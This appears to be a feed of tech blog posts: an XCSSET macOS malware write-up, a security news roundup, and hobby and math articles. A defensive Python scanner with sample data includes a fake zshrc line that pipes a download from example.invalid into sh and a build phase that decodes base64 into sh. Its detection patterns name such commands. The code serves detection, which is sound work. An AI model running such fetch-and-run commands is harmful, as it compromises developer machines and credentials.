  • Targets and attack vectors: the right-hand part of the image shows numerous targets and infected modules, suggesting a highly scalable attack strategy capable of hitting macOS developers worldwide. The presence of multiple modules demonstrates the malware's modular nature and the attackers' ability to update it with new functionality.

The analysis of the image highlights XCSSET's sophisticated architecture and the way it distributes its components effectively, making its detection and removal extremely complex.

Advanced obfuscation techniques and modular structure


One of the most insidious aspects of this new variant is its adoption of a more sophisticated obfuscation scheme. Module names have been masked to make static analysis harder, while heavy use of scripting languages and legitimate binaries lets the malware operate discreetly.

The malware's modular structure lets the attackers update its functionality without distributing a complete new version, increasing the flexibility and longevity of the threat. The identified capabilities include:

  • Decoding and executing obfuscated payloads to avoid detection by antivirus software.
  • Extensive use of UNIX commands to ensure compatibility with macOS systems.
  • Exploitation of legitimate tools to execute the malicious code, reducing the risk of being spotted by security tools.


Improved persistence techniques


To ensure it survives on the infected system, XCSSET implements three different persistence techniques:

  1. Modifying the Zsh shell configuration file ("zshrc" method): the malware injects malicious code into the shell configuration file, so that it runs automatically every time a user opens a new terminal session.
  2. Abusing the DockUtil tool ("dock" method): XCSSET downloads and uses DockUtil, a legitimately signed tool, to modify the macOS Dock settings. A fake application named Launchpad is created that runs both the genuine application and the malware.
  3. Infecting the Git process ("git" method): malicious code is injected into Git workflows, ensuring that the malware runs during commit operations.


Conclusion and mitigation measures


The evolution of XCSSET shows how cyber threats are constantly changing, adopting new strategies to evade security controls. To mitigate the risks associated with this threat, developers should take the following precautions:

  • Always verify the integrity of Xcode projects before compiling them.
  • Use up-to-date security tools to identify any anomalies.
  • Monitor network traffic to spot suspicious communications with C2 servers.
  • Limit the use of unverified scripts inside development projects.

The analysis by Microsoft Threat Intelligence underlines the importance of maintaining high levels of security, especially in development environments. macOS developers must be aware of emerging threats and take proactive measures to protect their code and systems from sophisticated attacks such as XCSSET.

The article XCSSET: the invisible malware threatening macOS developers comes from the information security blog.
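One way to act on the first of those precautions, and on the zshrc persistence method above: a small heuristic scanner that pulls the run-script build phases out of a project.pbxproj and checks them, along with the lines of a shell rc file, for commands that rarely belong there. This is an added example, not Microsoft's detection logic; the patterns and the sample project and rc file are constructed for illustration.

```python
import re
import sys

# Constructed heuristics for this added example (not Microsoft's detection
# logic): commands that rarely belong in a build phase or a shell rc file.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\bbase64\b\s+(-d|-D|--decode)\b"), "decodes a base64 blob"),
    (re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z)?sh\b"), "pipes a download into a shell"),
    (re.compile(r"\beval\b"), "evals dynamically built code"),
    (re.compile(r"\b(python3?|perl|ruby)\s+-[ce]\b"), "runs an inline interpreter one-liner"),
]


def classify(command):
    """Return the (possibly empty) list of reasons a command string looks suspicious."""
    return [reason for pattern, reason in SUSPICIOUS_PATTERNS if pattern.search(command)]


# In project.pbxproj a run-script phase stores its script as an escaped string literal.
_PHASE_RE = re.compile(
    r'isa = PBXShellScriptBuildPhase;.*?shellScript = "((?:[^"\\]|\\.)*)";', re.DOTALL
)
_ESCAPES = {"n": "\n", "t": "\t"}


def _unescape(literal):
    return re.sub(r"\\(.)", lambda m: _ESCAPES.get(m.group(1), m.group(1)), literal)


def scan_pbxproj(text):
    """Return [(script, reasons)] for each run-script build phase that trips a heuristic."""
    findings = []
    for match in _PHASE_RE.finditer(text):
        script = _unescape(match.group(1))
        reasons = classify(script)
        if reasons:
            findings.append((script, reasons))
    return findings


def scan_rc_file(text):
    """Return [(line_no, line, reasons)] for suspicious lines in a shell rc file such as ~/.zshrc."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if stripped and not stripped.startswith("#"):
            reasons = classify(stripped)
            if reasons:
                findings.append((line_no, stripped, reasons))
    return findings


# Constructed sample project: one benign lint phase, one phase that decodes and runs a blob.
SAMPLE_PBXPROJ = r'''
		AA01 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "echo \"Linting...\"\nswiftlint\n";
		};
		AA02 /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "echo PLACEHOLDER_B64 | base64 -d | sh\n";
		};
'''

# Constructed sample ~/.zshrc with one injected line at the end.
SAMPLE_ZSHRC = """\
# constructed sample ~/.zshrc
export PATH="$HOME/bin:$PATH"
alias ll='ls -la'
curl -s http://example.invalid/update | sh
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Scan real files: *.pbxproj as Xcode projects, anything else as an rc file.
        for path in sys.argv[1:]:
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            hits = scan_pbxproj(text) if path.endswith(".pbxproj") else scan_rc_file(text)
            print(path, "->", hits or "clean")
    else:
        print("pbxproj:", scan_pbxproj(SAMPLE_PBXPROJ))
        print("zshrc:  ", scan_rc_file(SAMPLE_ZSHRC))
```

A hit is a prompt to read the script by hand, not proof of infection; a legitimate build phase can decode data too, which is why the scanner reports the full script text alongside the reason.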


Pi Hand is a Digital Display of a Different Sort


Hackers enjoy a good theme, and so it comes as no surprise that every time March 14th (Pi Day) rolls around, the tip line sees an uptick in mathematical activity. Whether it’s something they personally did or some other person’s project they want to bring to our attention, a lot of folks out there are very excited about numbers today.

One of our most prolific circumference aficionados is [Cristiano Monteiro], who, for the last several years, has put together a special project to commemorate the date. For 2025, he’s come up with a robotic hand that will use its fingers to show the digits of Pi one at a time. Since there’s only one hand, anything higher than five will be displayed as two gestures in quick succession, necessitating a bit of addition on the viewer’s part.

[Cristiano] makes no claims about the anatomical accuracy of his creation. Indeed, if your mitts look anything like this, you should seek medical attention immediately. But whether you think of them as fingers or nightmarish claws, it’s the motion of the individual digits that matter.

To that end, each one is attached to an MG90 servo, which an Arduino Nano drives with attached Servo Shield. From there, it’s just a matter of code to get the digits wiggling out the correct value, which [Cristiano] has kindly shared for anyone looking to recreate this project.

If you’re hungry for more Pi, the ghostly display that [Cristiano] sent in last year is definitely worth another look. While not directly related to today’s mathematical festivities, the portable GPS time server he put together back in 2021 is another fantastic build you should check out.

youtube.com/embed/zKS8LcoMIho?…


hackaday.com/2025/03/14/pi-han…


Hackaday Podcast Episode 312: Heart Attacks, the Speed of Light, and Self-balancing


Elliot does the podcast on the road to Supercon Europe, and Al is in the mood for math and nostalgia this week. Listen in and find out what they were reading on Hackaday this week.

The guys talked about the ESP-32 non-backdoor and battery fires. Then it was on to the hacks.

Self-balancing robots and satellite imaging were the appetizers, but soon they moved on to Kinect cameras in the modern day. Think you can’t travel at the speed of light? Turns out that maybe you already are.

Did you know there was a chatbot in 1957? Well, sort of. For the can’t miss stories: watches monitor your heart and what does the number e really mean?

Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!

html5-player.libsyn.com/embed/…

Download in DRM-free MP3 and stream it on the big speakers.



Episode 312 Show Notes:


What’s that Sound?


  • We had a ton of answers this week, and many of them were correct. It was a disposable film camera being wound and shot. Congratulations to [Bobby Tables] for getting the correct answer and winning the webcam-driven dice toss.



hackaday.com/2025/03/14/hackad…


You Know Pi, But Do You Really Know E?


Pi Day is here! We bet that you know that famous constant to a few decimal points, and you could probably explain what it really means: the ratio of a circle’s circumference to its diameter. But what about the constant e? Sure, you might know it is a transcendental number around 2.72 or so. You probably know it is the base used for natural logarithms. But what does it mean?

The poor number probably needed a better agent. After all, pi is a fun name, easy to remember, with a distinctive Greek letter and lots of pun potential. On the other hand, e is just a letter. Sometimes it is known as Euler’s number, but Leonhard Euler was so prolific that there is also Euler’s constant and a set of Euler numbers, none of which are the same thing. Sometimes, you hear it called Napier’s constant, and it is known that Jacob Bernoulli discovered the number, too. So, even the history of this number is confusing.

But back to math: the number e is the base rate of growth for any continually growing process. That didn’t help? Well, consider that many things grow or decay continuously, at a rate that depends on how much is already there. For example, a bacteria culture might double every 72 hours. Or a radioactive sample might decay a certain amount per century.

Classic


The classic example is compound interest. Suppose you have $100, and you put it in the bank for a 10% per year return (please tell us where we can find that, by the way). So at the end of the year, we have $110, right? But what if you compound it every six months?

To figure that out, you look at the $100 after six months. The annual interest on the money is still $10, but we are only at 6 months, so prorated, that’s $5. Therefore, after six months, we have $105. At the end of the year, we look at 10% of $105 ($10.50). That’s still for a year, so we need to halve it ($5.25) and add it in ($105 + $5.25 = $110.25). So, compounding every six months means we get an extra quarter compared to simple interest.

What if it was compounded monthly? Now, we divide our interest by 12, but we have a little more money every month. After the first month, we have $100.83 ($100.00 + 10/12). The second month’s net is $101.67. By the end of the year, you have $110.47. Not quite twice as much extra as you had before.

So what if you could compound weekly? Or daily? Or hourly? Generally, you’ll get more, at least up to a point. Eventually, the interest will be split up so much that it will balance the increase and, at that point, you won’t make any more. There is an upper limit to how much money we can have at the end of the year at 10%, no matter how often you compound the interest.

So Where’s e?


Assume you could get a 100% return on your money (definitely let us know how to do that). That means if you go for a year, that’s a return of 2 — you double your money. But if you split the year in half and compound, you get 2.25 times the original amount. You can try a few more splits, and you’ll find the equation for growth is (1+1/n)^n. That is, if you only compute it once (n=1), you get double (1+1). If you compute interest twice, you get 2.25 (that is, (1+1/2)^2).

If you set n to 1,000, the return will be 2.7169. That’s even better than 2.25. So 100,000 should be wildly better, right? Not so much. At 100,000 you get a 2.71814 return. At 10,000,000 the rate is 2.71828 (or so).

Look at those numbers. Going from 1,000 to 10,000,000 only increases yield by about 0.001. If you know calculus, you might know how to take the limit of the growth equation. If not, you can still see it is going to top off at around 2.718. Those are the first digits of e.

Of course, e is like pi — transcendental — so you can’t ever get all the digits. You just keep getting closer and closer to the actual value. But 2.718 is pretty close for practical purposes.

Scaling


We can scale e to whatever problem we have at hand. We just have to be mindful of the starting amount, the rate, and what a time period means. For example, to work with our 10% rate (instead of 100%) we have to consider the rate e^0.10 or about 1.105. Then, to scale for amounts, we have to multiply by the rate. So remember our $100 at 10% example? Our maximum return is 100 x 1.105 = 110.50. Why did we only get $110.47? Because we compounded 12 times. The $110.50 result is the maximum.

More Years


You can also multiply the rate by the number of periods. So if we left the money in for five years: 100 x e^(0.10 x 5). If you think about it, then, making 50% for one year has the same maximum as making 10% for 5 years (or 25% for 2 years).

Negative Growth?


Suppose you have 120 grams of some radioactive material that decays at a rate of 50% per year. How much will be left after three years? Simplistically, it seems like the answer is that it will be depleted after two years. But that’s not true.

Just as compounding adds more money, a decay rate removes some of the radioactive material, meaning the absolute decay rate gets slower and slower with time because it is a percentage of the radioactive material’s mass.

Just for the sake of an example, suppose at some imaginary small period, the sample is at 100 grams and, thus, the decay rate is 50 grams/year. Later, the sample is at 80 grams. The decay rate is 40 grams/year, so it will take longer to go from 80 to 60 than it did to go from 100 to 80.

In this case, the rate is negative, so the formula will be 120 x e^(-0.5 x 3). That means you will have about 26.8 grams of radioactive material left in three years.

Modeling


Consider the classic equation for an RC circuit: Vc = Vs(1 - e^(-t/(RC))). Here, Vc is the capacitor voltage, Vs is the supply voltage, t is in seconds, and RC is the product of the resistance in ohms and the capacitance in farads.

What can we infer from this? Well, you could also write this as: Vc = Vs - Vs x e^(-t/(RC)). Looking at our earlier model for money, it is plain that Vs is the voltage we start with, t is the time, and the rate is -1/RC (time can’t be negative, after all). That makes sense because RC is the time constant in seconds, so 1/RC is the rate per second. The formula tells us how much voltage is charged in the capacitor, and subtracting that from Vs gives us the voltage drop across the capacitor.

Think about this circuit:

At t=0, we have Vs(1 - e^0), which is 0. At t=0.5, the voltage should be about 7.86V; at t=1, it should be up to 10.57V. As you can see, the simulation matches the math well enough.

Discharging is nearly the same: Vc = V0 x e^(-t/(RC)). Obviously, V0 is the voltage you started with and, again, -1/RC is the rate.

So Now You Know!


There’s a common rule of thumb that after a time period (RC) a capacitor will charge to about 63% or discharge to about 37%. Now that you know the math, you can see that e^-1 = 0.37 and 1 - e^-1 = 0.63. If you want to do the actual math, you can always set up a spreadsheet.
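The article's numbers, worked through in Python as an added example (not the author's code or spreadsheet). The component values are an assumption, since the schematic is not reproduced above: Vs = 12 V with R = 470 kΩ and C = 1 µF (RC = 0.47 s) reproduces the 7.86 V and 10.57 V quoted.

```python
import math


def compound(principal, rate, periods_per_year, years=1):
    """Discrete compounding, as in the bank example: interest is added
    periods_per_year times a year, each time at rate / periods_per_year."""
    return principal * (1 + rate / periods_per_year) ** (periods_per_year * years)


def growth_factor(n):
    """(1 + 1/n)^n: 100% interest compounded n times in a year; tends to e as n grows."""
    return (1 + 1 / n) ** n


def continuous(principal, rate, years=1):
    """The limit of compounding infinitely often: principal * e^(rate * years).
    A negative rate models decay, e.g. 120 g at -50%/year for 3 years."""
    return principal * math.exp(rate * years)


def rc_charge(vs, r, c, t):
    """Capacitor voltage while charging: Vs * (1 - e^(-t/RC)).
    r in ohms, c in farads, t in seconds."""
    return vs * (1 - math.exp(-t / (r * c)))


def rc_discharge(v0, r, c, t):
    """Capacitor voltage while discharging: V0 * e^(-t/RC)."""
    return v0 * math.exp(-t / (r * c))


def approach_to_e(ns=(1, 2, 12, 1000, 100_000, 10_000_000)):
    """Table of (n, (1 + 1/n)^n) showing how slowly the extra yield grows."""
    return [(n, growth_factor(n)) for n in ns]


if __name__ == "__main__":
    # $100 at 10%, compounded yearly, twice a year, monthly, and continuously.
    for periods in (1, 2, 12):
        print(f"{periods:3d} periods/year -> ${compound(100, 0.10, periods):.2f}")
    print(f"continuous      -> ${continuous(100, 0.10):.2f}")

    # Convergence of (1 + 1/n)^n towards e = 2.718281828...
    for n, value in approach_to_e():
        print(f"n = {n:>10,d}: {value:.5f}")

    # 120 g decaying at 50%/year for 3 years.
    print(f"decay: {continuous(120, -0.5, 3):.1f} g left")

    # RC charging curve. Assumed component values (the article's schematic is
    # not reproduced here): Vs = 12 V, R = 470 kOhm, C = 1 uF, so RC = 0.47 s.
    for t in (0.0, 0.5, 1.0):
        print(f"t = {t:.1f} s: Vc = {rc_charge(12, 470e3, 1e-6, t):.2f} V")

    # The 63% / 37% rule of thumb after one time constant.
    print(f"1 - e^-1 = {1 - math.exp(-1):.2f}, e^-1 = {math.exp(-1):.2f}")
```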

Anything that grows or shrinks exponentially is a candidate for using an equation involving e. That’s why it is a common base for logarithms. Of course, most slide rules use logarithms, but not all of them do.

(Title image showing e living in pi’s shadow adapted from “Pi” by [Taso Katsionis] via Unsplash.)


Utah’s FORGE: a Research Laboratory For Enhanced Geothermal Systems


Geothermal heat is a tantalizing source of energy that’s quite literally right below our feet. At the same time, geothermal energy is hard to develop, as the Earth’s crust is too thick in most places, limiting it to areas where magma is close enough to the surface and the underground rock is permeable enough for water. The Utah FORGE facility is a field site where researchers are developing and testing ways to increase the scope of geothermal energy.

An Enhanced Geothermal System (EGS) is designed to be capable of using geothermal energy where this is normally not feasible through a technique that’s reminiscent of the hydraulic fracturing (‘fracking’) used by the oil and gas industry, but rather than creating more fractures, it instead uses hydro-shearing to prop open existing fractures and thus create the through-flow of water needed to extract geothermal energy.

So far FORGE has reported the successful creation of a geothermal reservoir where before there was none. This facility is located in the Milford valley in southwest Utah, which has some hydrothermal activity at the nearby Roosevelt Hot Springs, but through EGS other parts of this valley and similar areas could conceivably be used for generating electricity and for community heating as well. In a 2024 study by University of Utah scientists, it is described how the Milford valley’s volcanic past has left a large body of magma below a thick barrier of granitic rock that could provide access to geothermal resources with EGS to create the requisite fluid permeability.

FORGE is not the only facility working on EGS, but many other sites around the world have ceased activities after issues ranging from induced seismicity and susceptibility to earthquakes to budget shortages. Much like fracking, EGS is likely to cause earthquakes. Whether EGS can be made economically feasible remains to be seen.


hackaday.com/2025/03/14/utahs-…


This Week in Security: The X DDoS, The ESP32 Basementdoor, and the camelCase RCE


We would be remiss if we didn’t address the X Distributed Denial of Service (DDoS) attack that’s been happening this week. It seems like everyone is trying to make political hay out of the DDoS, but we’re going to set that aside as much as possible and talk about the technical details. Elon made an early statement that X was down due to a cyberattack, with the source IPs tracing back to “the Ukraine area”.

The latest reporting seems to conclude that this was indeed a DDoS, and a threat group named “Dark Storm” has taken credit for the attack. Dark Storm does not seem to be of Ukrainian origin or affiliation.

We’re going to try to read the tea leaves just a bit, but remember that about the only thing we know for sure is that X was unreachable for many users several times this week. This is completely consistent with the suspected DDoS attack. The quirk of modern DDoS attacks is that the IP addresses on the packets are never trustworthy.

There are two broad tactics used for large-scale DDoS attacks, sometimes used simultaneously. The first is the simple botnet. Computers, routers, servers, and cameras around the world have been infected with malware, and then remote controlled to create massive botnets. Those botnets usually come equipped with a DDoS function, allowing the botnet runner to task all the bots with sending traffic to the DDoS victim IPs. That traffic may be UDP packets with spoofed or legitimate source IPs, or it may be TCP Synchronization requests, with spoofed source IPs.

The other common approach is the reflection or amplification attack. This is where a public server can be manipulated into sending unsolicited traffic to a victim IP. It’s usually DNS, where a short message request can return a much larger response. And because DNS uses UDP, it’s trivial to convince the DNS server to send that larger response to a victim’s address, amplifying the attack.

Put these two techniques together, and you have a botnet sending spoofed requests to servers, that unintentionally send the DDoS traffic on to the target. And suddenly it’s understandable why it’s so difficult to nail down attribution for this sort of attack. It may very well be that a botnet with a heavy Ukrainian presence was involved in the attack, which at the same time doesn’t preclude Dark Storm as the originator. The tea leaves are still murky on this one.

That ESP32 Backdoor


As Maya says, it really wasn’t a backdoor. The Bleeping Computer article and Tarlogic press release have both been updated to reflect the reality that this wasn’t really a backdoor. Given that the original research and presentation were in Spanish, we’re inclined to conclude that the “backdoor” claim was partially a translation issue.

The terminology storm set aside, what researchers found really was quite interesting. The source of information was official ESP32 binaries that implement the Bluetooth HCI, the Host Controller Interface. It’s a structured format for talking to a Bluetooth chip. The official HCI has set aside command space for vendor-specific commands. The “backdoor” that was discovered was this set of undocumented vendor-specific commands.

These commands were exposed over the HCI interface, and included low-level control over the ESP32 device. However, for the vast majority of ESP32 use cases, this interface is only available to code already running on the device, and thus isn’t a security boundary violation. To Espressif’s credit, their technical response does highlight the case of using an ESP32 in a hosted mode, where an external processor is issuing HCI commands over something like a serial link. In that very narrow case, the undocumented HCI commands could be considered a backdoor, though it still requires compromise of the controlling device first.

All told, it’s not particularly dangerous as a backdoor. It’s a set of undocumented instructions that expose low-level functions, but only from inside the house. I propose a new term for this: a Basementdoor.

The Fake Recruitment Scam


The fake recruitment scam isn’t new to this column, but this is the first time we’ve covered a first-hand account of it. This is the story of [Ron Jansen], a freelance developer with impressive credentials. He got a recruiter’s message, looking to interview him for a web3 related position. Interviews often come with programming tasks, so it wasn’t surprising when this one included instructions to install something from Github using npm and do some simple tasks.

But then, the recruiter and CTO both went silent, and [Ron] suddenly had a bad feeling about that npm install command. Looking through the code, it looked boring, except for the dependency NPM package, process-log. With only 100-ish weekly downloads, this was an obvious place to look for something malicious. It didn’t disappoint, as this library pulled an obfuscated blob of JSON code and executed it during install. The deobfuscated code establishes a websocket connection, and uploads cookies, keychains, and any other interesting config or database files it can find.

Once [Ron] knew he had been had, he started the infuriating-yet-necessary process of revoking API keys, rotating passwords, auditing everything, and wiping the affected machine’s drive. The rest of the post is his recommendations for how to avoid falling for this scam yourself. The immediate answer is to run untrusted code in a VM or sandbox. There are tools like Deno that can also help, doing sandboxing by default. Inertia is the challenge with a major change like that.

Camel CamelCase RCE


Apache Camel is a Java library for doing Enterprise Integration Patterns. AKA, it’s network glue code for a specific use case. It sends data between endpoints, and uses headers to set certain options. One of the important security boundaries there is that internal headers shouldn’t be set by outside sources. To accomplish that, those headers are string compared with Camel and org.apache.camel as the starting characters. The problem is that the string comparison is exact, while the header names themselves are not case sensitive. It’s literally a camelCase vulnerability. The result is that all the internal headers are accessible from any client, via this case trickery.

The vulnerability has been fixed in the latest release of Camel. The seriousness of this vulnerability depends on the component being connected to. Akamai researchers provided a sample application, where the headers were used to construct a command. The access to these internal values makes this case an RCE. This ambiguity is why the severity of this vulnerability is disputed.
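The case-sensitivity gap described above, modelled in a few lines of Python as an added example: the exact-case prefix test beside a case-folded one. This is not Camel's own code, and the header names and values are constructed placeholders, not real Camel headers.

```python
# Constructed model of the header filter described above (added example; not
# Camel's own code). Internal headers are recognised by their name prefix.
INTERNAL_PREFIXES = ("Camel", "org.apache.camel")


def is_internal_exact(name):
    """Vulnerable check: exact-case prefix test on a header name that the
    transport treats case-insensitively, so 'camelFoo' is not recognised."""
    return name.startswith(INTERNAL_PREFIXES)


def is_internal_folded(name):
    """Corrected check: fold case on both sides before comparing."""
    folded = name.casefold()
    return any(folded.startswith(prefix.casefold()) for prefix in INTERNAL_PREFIXES)


def strip_internal(headers, is_internal):
    """Drop every header a remote client is not allowed to set."""
    return {name: value for name, value in headers.items() if not is_internal(name)}


def lookup(headers, wanted):
    """Case-insensitive lookup, the way the route later reads the header."""
    wanted = wanted.casefold()
    for name, value in headers.items():
        if name.casefold() == wanted:
            return value
    return None


# Constructed inbound request. The header names are placeholders, not real
# Camel headers; the last two differ from an internal prefix only by case.
INBOUND_HEADERS = {
    "Content-Type": "text/plain",
    "CamelExampleOption": "set-by-client",
    "camelExampleOption": "set-by-client-via-case-trick",
    "org.Apache.Camel.ExampleOption": "set-by-client-via-case-trick",
}


def demonstrate():
    """Return what the route would see for the internal header under each filter."""
    vulnerable = strip_internal(INBOUND_HEADERS, is_internal_exact)
    fixed = strip_internal(INBOUND_HEADERS, is_internal_folded)
    return {
        "exact_case_filter": lookup(vulnerable, "CamelExampleOption"),
        "case_folded_filter": lookup(fixed, "CamelExampleOption"),
    }


if __name__ == "__main__":
    for filter_name, seen in demonstrate().items():
        print(f"{filter_name}: route sees {seen!r}")
```

The same pattern applies to any deny-list on a case-insensitive namespace: normalise first, then compare, or the filter and the consumer disagree about which names match.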

Bits and Bytes


Researchers at Facebook have identified a flaw in the FreeType font rendering library. It’s an integer underflow leading to a buffer overflow. An attacker can specify a very large integer value, and the library will add to that variable during processing. This causes the value to wrap around to a very small value, resulting in a buffer much too small to hold the given data. This vulnerability seems to be under active exploitation.

We don’t normally see problems with a log file leading to exploitation, but that seems to be the situation with the Below daemon. The service runs as root, and sets the logfile to be world readable. Make that logfile a symlink to some important file, and when the service starts, it overwrites the target file’s permissions.

Microsoft’s Patch Tuesday includes a whopping six 0-day exploits getting fixed this month. Several of these are filesystem problems, and at least one is an NTFS vulnerability that can be triggered simply by plugging in a USB drive.

The ruby-saml library had a weird quirk: it used two different XML parsers while doing signature validations. That never seems to go well, and this is not any different. It was possible to pack two different signatures into a single XML document, and the two different parsers would each see the file quite differently. The result was that any valid signature could be hijacked to attest as any other user. Not good. An initial fix has already landed, with a future release dropping one of the XML parsers and doing a general security hardening pass.


hackaday.com/2025/03/14/this-w…


ClockworkPi Unveils New PicoCalc Handheld


Do you like scientific calculators? Don’t bother answering that question, you’re reading Hackaday so we already know the answer. We also know you’re a fan of building things yourself and open source, which makes us fairly sure you’ll be just as interested in the recently announced ClockworkPi PicoCalc as we are.

On the surface, it looks like a chunky scientific calculator, though on further inspection you’ll note it comes equipped with a QWERTY keyboard. But open up the case and what you’ve really got is an elaborate carrier board for the Raspberry Pi Pico. The PicoCalc supports all variants of the microcontroller, but realistically we can’t think of any reason that you wouldn’t just use the latest version.

With the MCU connected, you’ll have access to the PicoCalc’s 320×320 4-inch IPS screen, backlit I2C-connected keyboard, SD card slot, 8 MB PSRAM, and dual PWM speakers. Power is provided by a pair of 18650 cells (which you’ll need to supply on your own), and the board has the necessary circuitry to charge them up over USB-C.

Everything is housed in an injection molded case, but the project page says all the necessary CAD files will eventually be released under the GPL v3 so you can 3D print or CNC your own enclosure. For now though, the only thing of note that seems to be in the PicoCalc GitHub repository is a PCB schematic.

The software side of things is a little less clear. The page mentions a BASIC interpreter, MP3 playback, and support for various programming languages, but we get the impression that’s just a list of stuff you can run on the Pi Pico. There are a few images that clearly show the PicoCalc actually being used as a calculator however, so there may be an official firmware yet to be revealed.

The PicoCalc kit is on sale now, and will set you back $75 USD — which actually includes a first-generation Pi Pico, on the off chance that you don’t already have a few laying around. We’ve been impressed with the previous offerings from ClockworkPi, so assuming this new kit maintains that same build quality, it seems like a fair enough price.


hackaday.com/2025/03/14/clockw…


The Trials and Tribulations of Building a Pasta Display


We love unique displays here at Hackaday. If you can figure out how to show information on some weird object, we’re all about it. So when [Julius Curt] wrote in to share his work on the Pasta Analog Display, we were hooked from the subject line.

But in reading his account, it ended up being even better than we hoped for. Because it turns out, getting pasta to behave properly in an electromechanical device is trickier than you might think. Oh sure, as [Julius] points out, those ridges on the side of penne might make them look like gears — but after spending the time and effort to build a particularly slick 3D printed frame to actually use them as such, it turns out they just won’t cooperate. You’d think the pasta makers of the world would have some respect for mechanical tolerances, but unfortunately not.

This version of the pasta display didn’t work, but we love the design.
So if [Julius] couldn’t use the natural shape of the penne to get them to rotate, what was the alternative? First, he switched to the far larger cannelloni. Their increased internal volume, most commonly used to hold spinach and ricotta, has in this case been stuffed with a 3D printed armature. Thus each cannelloni is physically attached to a gear, which means when one of them is rotated by a 28BYJ-48 stepper motor, the rest follow.

All that’s left is to apply some artwork to the pasta (again, easier said than done), and rotate them into position. Depending on how much you can cram onto each cannelloni, the display can be rotated to show several different messages. In the video below, [Julius] shows off three distinct images rendered at the push of a button.

If you get hungry while trying to turn pasta into a workable display medium, you can always cook and eat some of your building materials. Luckily, a couple years ago Barilla released the design for an open source device to help you cook their pasta more efficiently.

youtube.com/embed/mlT0Z5JhcTU?…


hackaday.com/2025/03/14/the-tr…


A Privilege Escalation in Microsoft Windows Exploited for 2 Years Lands in Patch Tuesday. Update, Warn CISA and ACN


The March Patch Tuesday includes CVE-2025-24983, an elevation of privilege vulnerability in the Win32 kernel subsystem of Microsoft Windows.

The Cybersecurity and Infrastructure Security Agency (CISA) has added two new vulnerabilities to its Known Exploited Vulnerabilities catalog, one of which is CVE-2025-24983, which is being actively exploited by attackers. The CSIRT of Italy’s National Cybersecurity Agency (ACN) did the same with a dedicated bulletin that also covers this CVE.

According to cybersecurity firm ESET, which discovered and reported the vulnerability, attackers have been exploiting this flaw in the wild since March 2023, making it one of the longest-running active exploits before a fix was released.

The security bug lies in the Windows Win32 kernel subsystem and has been classified as a use-after-free (UAF) weakness that allows low-privileged attackers to elevate their privileges to SYSTEM without requiring user interaction.

Despite its significant impact, Microsoft rated the vulnerability “Important” rather than “Critical” because of the high exploitation complexity, which requires attackers to win a race condition.

“The vulnerability is a use-after-free vulnerability in the Win32k driver,” ESET explained in its technical analysis. “In a certain scenario achieved using the WaitForInputIdle API, the W32PROCESS structure is dereferenced one more time than it should be, causing a UAF.”

ESET researcher Filip Jurčacko, who discovered the exploit, found that it was being distributed through a sophisticated backdoor known as PipeMagic.

The article “A Privilege Escalation in Microsoft Windows Exploited for 2 Years Lands in Patch Tuesday. Update, Warn CISA and ACN” originally appeared on il blog della sicurezza informatica.


The Mysterious and Important Work of Prop Design on Severance


Have you seen Severance? Chances are good that you have; the TV series has become wildly popular in its second season, to the point where the fandom’s dedication is difficult to distinguish from the in-universe cult of [Kier]. Part of the show’s appeal comes from its overall aesthetic, which is captured in this description of the building of one of the show’s props.

A detailed recap of the show is impossible, but for the uninitiated, a mega-corporation called Lumon has developed a chip that certain workers have implanted in their brains to sever their personalities and memories into work and non-work halves. The working “Innies” have no memory of what their “Outies” do when they aren’t at work, which sounds a lot better than it actually ends up being. It’s as weird as it sounds, and then some.

The prop featured here is the “WoeMeter” from episode seven of season two, used to quantify the amount of woe in a severed worker — told you it was weird. The prop was built by design house [make3] on a short timeline and after seeing only some sketches and rough renders from the production designers, and had to echo the not-quite-midcentury modern look of the whole series. The builders took inspiration from, among other things, a classic Nagra tape recorder, going so far as to harvest its knobs and switches to use in the build. The controls are all functional and laid out in a sensible way, allowing the actors to use the device in a convincing way. For visual feedback, the prop has two servo-operated meters and a string of seven-segment LED displays, all controlled by an ESP-32 mounted to a custom PCB. Adding the Lumon logo to the silkscreen was a nice touch.

The prop maker’s art is fascinating, and the ability to let your imagination run wild while making something that looks good and works for the production has got to be a blast. [make3] really nailed it with this one.

Thanks to [Aaron’s Outie] for the tip.


hackaday.com/2025/03/13/the-my…


Tracking Deep-Sky Objects


Astrophotography, and astronomy in general, takes some fairly specialized tools and a high degree of precision. Setting up the equipment can also take a lot of time, especially for amateurs traveling to various locations with their gear, so anything that reduces the time spent looking for objects and increases the time spent looking at them is a welcome addition, especially since nights with ideal conditions can be rare. [Anton] developed this real-time tracking tool for deep sky objects (DSOs) to keep tabs on most of the interesting things out there a telescope can be pointed at.

[Anton] calls his tool the Nova DSO Altitude Tracker; it gets its information from SIMBAD, updating every minute for a given location on the planet. With that location data, the program calculates altitude and azimuth for various objects and also helps the user keep track of other important variables like moon illumination and angle above the horizon. It also allows the user to highlight specific objects of interest, making sure they are front and center throughout the session. Each DSO can be selected from a list to display detailed information about it such as its path, time visible in the sky, and other properties.

To get the program running, essentially all that’s required is a computer capable of running Python and a display of some sort. From there it provides a quick view of the best objects to point one’s telescope or camera at without any guesswork. With all of the code available it shouldn’t be too much of a leap to do other things with the underlying software, either, such as tying it into a tracker of some sort like this DIY telescope tracking device we featured a while back.


hackaday.com/2025/03/13/tracki…


BritCSS: Write CSS With British English Spellings


Everyone knows that there is only one proper English, with the rest being mere derivatives that bastardize the spelling and grammar. Despite this, the hoodlums who staged a violent uprising against British rule in the American colonies have somehow made their uncouth dialect dominant in the information technologies that have taken the world by storm these past decades. In this urgent mission to restore the King’s English to its rightful place, we fortunately have patriotic British citizens who have taken it upon themselves to correct this grave injustice. Brave citizens such as [Declan Chidlow], whose BritCSS project is a bright beacon in these harrowing times.

Implemented as a simple, 14 kB JavaScript script to be included in an HTML page, it allows one to write CSS files using proper spelling, such as background-colour and centre. Meanwhile harsh language such as !important is replaced with the more pleasant !if-you-would-be-so-kind. It is expected that although for now this script has to be included on each page to use BritCSS, native support will soon be implemented in every browser, superseding the US dialect version. [Declan] has also been recommended to be awarded the Order of the British Empire for his outstanding services.


